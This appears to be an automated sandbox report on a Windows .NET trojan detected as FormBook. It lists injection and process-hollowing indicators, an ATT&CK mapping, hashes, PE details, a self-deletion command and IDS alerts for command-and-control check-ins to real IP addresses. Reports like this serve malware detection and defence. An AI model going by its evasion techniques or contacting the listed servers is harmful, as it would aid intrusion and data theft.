          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A0EA5 mov eax, dword ptr fs:[00000030h]2_2_015A0EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBF0BF mov ecx, dword ptr fs:[00000030h]7_2_04BBF0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBF0BF mov eax, dword ptr fs:[00000030h]7_2_04BBF0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBF0BF mov eax, dword ptr fs:[00000030h]7_2_04BBF0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1B8D0 mov eax, dword ptr fs:[00000030h]7_2_04C1B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1B8D0 mov ecx, dword ptr fs:[00000030h]7_2_04C1B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1B8D0 mov eax, dword ptr fs:[00000030h]7_2_04C1B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1B8D0 mov eax, dword ptr fs:[00000030h]7_2_04C1B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1B8D0 mov eax, dword ptr fs:[00000030h]7_2_04C1B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1B8D0 mov eax, dword ptr fs:[00000030h]7_2_04C1B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C58CD6 mov eax, dword ptr fs:[00000030h]7_2_04C58CD6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC90AF mov eax, dword ptr fs:[00000030h]7_2_04BC90AF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB20A0 mov eax, dword ptr fs:[00000030h]7_2_04BB20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB20A0 mov eax, dword ptr fs:[00000030h]7_2_04BB20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB20A0 mov eax, dword ptr fs:[00000030h]7_2_04BB20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB20A0 mov eax, dword ptr fs:[00000030h]7_2_04BB20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB20A0 mov eax, dword ptr fs:[00000030h]7_2_04BB20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB20A0 mov eax, dword ptr fs:[00000030h]7_2_04BB20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9849B mov eax, dword ptr fs:[00000030h]7_2_04B9849B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06CF0 mov eax, dword ptr fs:[00000030h]7_2_04C06CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06CF0 mov eax, dword ptr fs:[00000030h]7_2_04C06CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06CF0 mov eax, dword ptr fs:[00000030h]7_2_04C06CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B89080 mov eax, dword ptr fs:[00000030h]7_2_04B89080
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C414FB mov eax, dword ptr fs:[00000030h]7_2_04C414FB
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C03884 mov eax, dword ptr fs:[00000030h]7_2_04C03884
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C03884 mov eax, dword ptr fs:[00000030h]7_2_04C03884
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B858EC mov eax, dword ptr fs:[00000030h]7_2_04B858EC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1C450 mov eax, dword ptr fs:[00000030h]7_2_04C1C450
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1C450 mov eax, dword ptr fs:[00000030h]7_2_04C1C450
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9B02A mov eax, dword ptr fs:[00000030h]7_2_04B9B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9B02A mov eax, dword ptr fs:[00000030h]7_2_04B9B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9B02A mov eax, dword ptr fs:[00000030h]7_2_04B9B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9B02A mov eax, dword ptr fs:[00000030h]7_2_04B9B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB002D mov eax, dword ptr fs:[00000030h]7_2_04BB002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB002D mov eax, dword ptr fs:[00000030h]7_2_04BB002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB002D mov eax, dword ptr fs:[00000030h]7_2_04BB002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB002D mov eax, dword ptr fs:[00000030h]7_2_04BB002D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe Memory written: C:\Users\user\Desktop\lTAPQJikGw.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: E00000
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe Process created: C:\Users\user\Desktop\lTAPQJikGw.exe C:\Users\user\Desktop\lTAPQJikGw.exe
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\lTAPQJikGw.exe'
          Source: explorer.exe, 00000003.00000000.687115510.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000003.00000000.687455118.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.916888031.0000000003410000.00000002.00000001.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.687455118.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.916888031.0000000003410000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.687455118.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.916888031.0000000003410000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.687455118.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.916888031.0000000003410000.00000002.00000001.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.676552486.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe Queries volume information: C:\Users\user\Desktop\lTAPQJikGw.exe VolumeInformation
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
          | Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 221 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
          | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
          | Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
          | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud |
          | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
          | Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
          | External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |

          Behavior Graph

          [Figure: behavior graph. Behavior Graph ID: 432746, Sample: lTAPQJikGw, Startdate: 10/06/2021, Architecture: WINDOWS, Score: 100. Process chain: lTAPQJikGw.exe started a second lTAPQJikGw.exe, which started control.exe and injected into explorer.exe; control.exe started cmd.exe, which started conhost.exe.]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          lTAPQJikGw.exe | 44% | Virustotal |
          lTAPQJikGw.exe | 43% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
          lTAPQJikGw.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          2.0.lTAPQJikGw.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          2.2.lTAPQJikGw.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains


                                              Contacted URLs


                                              URLs from Memory and Binaries


                                                                      Contacted IPs

                                                                      Public


                                                                      General Information

                                                                      Joe Sandbox Version: 32.0.0 Black Diamond
                                                                      Analysis ID: 432746
                                                                      Start date: 10.06.2021
                                                                      Start time: 18:05:58
                                                                      Joe Sandbox Product: CloudBasic
                                                                      Overall analysis duration: 0h 11m 10s
                                                                      Hypervisor based Inspection enabled: false
                                                                      Report type: full
                                                                      Sample file name: lTAPQJikGw (renamed file extension from none to exe)
                                                                      Cookbook file name: default.jbs
                                                                      Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed: 15
                                                                      Number of new started drivers analysed: 0
                                                                      Number of existing processes analysed: 0
                                                                      Number of existing drivers analysed: 0
                                                                      Number of injected processes analysed: 1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode: default
                                                                      Analysis stop reason: Timeout
                                                                      Detection: MAL
                                                                      Classification: mal100.troj.evad.winEXE@8/1@12/11
                                                                      EGA Information:Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 21.1% (good quality ratio 18.7%)
                                                                      • Quality average: 71.6%
                                                                      • Quality standard deviation: 32.7%
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 113
                                                                      • Number of non-executed functions: 160
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      Warnings:
                                                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 13.88.21.125, 52.255.188.83, 168.61.161.212, 20.50.102.62, 20.75.105.140, 20.72.88.19, 20.54.26.129, 2.20.142.209, 2.20.142.210, 92.122.213.247, 92.122.213.194, 20.82.210.154
                                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, eus2-consumerrp-displaycatalog-aks2aks-useast.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                      • Not all processes were analyzed, report is missing behavior information

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      Time | Type | Description
                                                                      18:06:50 | API Interceptor | 1x Sleep call for process: lTAPQJikGw.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                      Domains

                                                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                      ASN

                                                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lTAPQJikGw.exe.log
                                                                      Process:C:\Users\user\Desktop\lTAPQJikGw.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1314
                                                                      Entropy (8bit):5.350128552078965
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                      MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                      SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                      SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                      SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                      Malicious:true
                                                                      Reputation:high, very likely benign file
                                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.529224716638736
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:lTAPQJikGw.exe
                                                                      File size:865792
                                                                      MD5:16657fa097cd334973a5489eeff8bafe
                                                                      SHA1:b6db5e9cc112155b7285f0a415cf4889ff1bf7ef
                                                                      SHA256:2589143d02f6aef252b5b704f6b98723ae131d3279bcf36d57ee26318bc0741f
                                                                      SHA512:982bfb6516d594a13ea987a878aed98125679b2a607a855b6a78283ce58da258a925faa75f8e72d25d591b6514bcc8786ec05231c2d0ebdd80ff2ec9931d4ec2
                                                                      SSDEEP:12288:TTHukblMV40uUSeQdQtq02pd55BcAbTDIbd5uIiDLuaCwH3:TqkbUuUxQh02pdnBcAbXedOLnCwH
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f..`..............P..............4... ...@....@.. ....................................@................................

                                                                      File Icon

                                                                      Icon Hash:f0e1e0b2b2ccb2cc

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x4a340e
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                      Time Stamp:0x60C10566 [Wed Jun 9 18:16:06 2021 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:v4.0.30319
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al

                                                                      Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xa33bc          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xa4000          0x31a4c       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xd6000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xa3284          0x1c          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                      Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type            Entropy         Characteristics
.text   0x2000           0xa1414       0xa1600   False     0.843792360573   SysEx File - Clavia  7.73125493594   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0xa4000          0x31a4c       0x31c00   False     0.442927528266   data                 6.16976587686   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xd6000          0xc           0x200     False     0.044921875      data                 0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

Name           RVA      Size     Type                                                                                                                                    Language  Country
RT_ICON        0xa4200  0x99e7   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON        0xadbf8  0x10828  dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON        0xbe430  0x94a8   data
RT_ICON        0xc78e8  0x5488   data
RT_ICON        0xccd80  0x4228   dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 2130706432
RT_ICON        0xd0fb8  0x25a8   data
RT_ICON        0xd3570  0x10a8   data
RT_ICON        0xd4628  0x988    data
RT_ICON        0xd4fc0  0x468    GLS_BINARY_LSB_FIRST
RT_GROUP_ICON  0xd5438  0x84     data
RT_VERSION     0xd54cc  0x380    data
RT_MANIFEST    0xd585c  0x1ea    XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                      Imports

DLL          Import
mscoree.dll  _CorExeMain

                                                                      Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2003 - 2021
Assembly Version  7.0.5.0
InternalName      CryptoConfig.exe
FileVersion       7.0.5.0
CompanyName       Jet Brain Inc.
LegalTrademarks
Comments
ProductName       JetBrain Assemblies
ProductVersion    7.0.5.0
FileDescription   JetBrain Assemblies
OriginalFilename  CryptoConfig.exe

                                                                      Network Behavior

                                                                      Snort IDS Alerts

Timestamp                 Protocol  SID      Message                                Source Port  Dest Port  Source IP      Dest IP
06/10/21-18:08:06.041509  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)   49765        80         192.168.2.4    74.220.199.8
06/10/21-18:08:06.041509  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)   49765        80         192.168.2.4    74.220.199.8
06/10/21-18:08:06.041509  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)   49765        80         192.168.2.4    74.220.199.8
06/10/21-18:08:23.084972  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)   49768        80         192.168.2.4    199.195.117.147
06/10/21-18:08:23.084972  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)   49768        80         192.168.2.4    199.195.117.147
06/10/21-18:08:23.084972  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)   49768        80         192.168.2.4    199.195.117.147
06/10/21-18:08:34.522965  TCP       1201     ATTACK-RESPONSES 403 Forbidden         80           49772      99.83.154.118  192.168.2.4
06/10/21-18:08:55.714557  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)   49776        80         192.168.2.4    104.21.15.16
06/10/21-18:08:55.714557  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)   49776        80         192.168.2.4    104.21.15.16
06/10/21-18:08:55.714557  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)   49776        80         192.168.2.4    104.21.15.16

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      Jun 10, 2021 18:08:17.731508970 CEST804976754.69.66.227192.168.2.4
                                                                      Jun 10, 2021 18:08:17.743844032 CEST804976754.69.66.227192.168.2.4
                                                                      Jun 10, 2021 18:08:17.743889093 CEST804976754.69.66.227192.168.2.4
                                                                      Jun 10, 2021 18:08:17.744141102 CEST4976780192.168.2.454.69.66.227
                                                                      Jun 10, 2021 18:08:17.744194031 CEST4976780192.168.2.454.69.66.227
                                                                      Jun 10, 2021 18:08:17.950335979 CEST804976754.69.66.227192.168.2.4
                                                                      Jun 10, 2021 18:08:22.932153940 CEST4976880192.168.2.4199.195.117.147
                                                                      Jun 10, 2021 18:08:23.084594011 CEST8049768199.195.117.147192.168.2.4
                                                                      Jun 10, 2021 18:08:23.084788084 CEST4976880192.168.2.4199.195.117.147
                                                                      Jun 10, 2021 18:08:23.084971905 CEST4976880192.168.2.4199.195.117.147
                                                                      Jun 10, 2021 18:08:23.237189054 CEST8049768199.195.117.147192.168.2.4
                                                                      Jun 10, 2021 18:08:23.239788055 CEST8049768199.195.117.147192.168.2.4
                                                                      Jun 10, 2021 18:08:23.240160942 CEST8049768199.195.117.147192.168.2.4
                                                                      Jun 10, 2021 18:08:23.240279913 CEST4976880192.168.2.4199.195.117.147
                                                                      Jun 10, 2021 18:08:23.240338087 CEST4976880192.168.2.4199.195.117.147
                                                                      Jun 10, 2021 18:08:23.394629002 CEST8049768199.195.117.147192.168.2.4
                                                                      Jun 10, 2021 18:08:28.335777044 CEST4976980192.168.2.4156.241.53.161
                                                                      Jun 10, 2021 18:08:28.562704086 CEST8049769156.241.53.161192.168.2.4
                                                                      Jun 10, 2021 18:08:28.562905073 CEST4976980192.168.2.4156.241.53.161
                                                                      Jun 10, 2021 18:08:28.563146114 CEST4976980192.168.2.4156.241.53.161
                                                                      Jun 10, 2021 18:08:28.789860010 CEST8049769156.241.53.161192.168.2.4
                                                                      Jun 10, 2021 18:08:29.070154905 CEST4976980192.168.2.4156.241.53.161
                                                                      Jun 10, 2021 18:08:29.303756952 CEST8049769156.241.53.161192.168.2.4
                                                                      Jun 10, 2021 18:08:29.303797960 CEST8049769156.241.53.161192.168.2.4
                                                                      Jun 10, 2021 18:08:29.303965092 CEST4976980192.168.2.4156.241.53.161
                                                                      Jun 10, 2021 18:08:29.304640055 CEST4976980192.168.2.4156.241.53.161
                                                                      Jun 10, 2021 18:08:34.289700985 CEST4977280192.168.2.499.83.154.118
                                                                      Jun 10, 2021 18:08:34.334131956 CEST804977299.83.154.118192.168.2.4
                                                                      Jun 10, 2021 18:08:34.334474087 CEST4977280192.168.2.499.83.154.118
                                                                      Jun 10, 2021 18:08:34.334511042 CEST4977280192.168.2.499.83.154.118
                                                                      Jun 10, 2021 18:08:34.376698971 CEST804977299.83.154.118192.168.2.4
                                                                      Jun 10, 2021 18:08:34.522964954 CEST804977299.83.154.118192.168.2.4
                                                                      Jun 10, 2021 18:08:34.523000002 CEST804977299.83.154.118192.168.2.4
                                                                      Jun 10, 2021 18:08:34.523241043 CEST4977280192.168.2.499.83.154.118
                                                                      Jun 10, 2021 18:08:34.527183056 CEST4977280192.168.2.499.83.154.118
                                                                      Jun 10, 2021 18:08:34.545643091 CEST804977299.83.154.118192.168.2.4
                                                                      Jun 10, 2021 18:08:34.546340942 CEST4977280192.168.2.499.83.154.118
                                                                      Jun 10, 2021 18:08:34.569499016 CEST804977299.83.154.118192.168.2.4
                                                                      Jun 10, 2021 18:08:39.602478981 CEST4977380192.168.2.4198.54.117.216
                                                                      Jun 10, 2021 18:08:39.800178051 CEST8049773198.54.117.216192.168.2.4
                                                                      Jun 10, 2021 18:08:39.800331116 CEST4977380192.168.2.4198.54.117.216
                                                                      Jun 10, 2021 18:08:39.800529003 CEST4977380192.168.2.4198.54.117.216
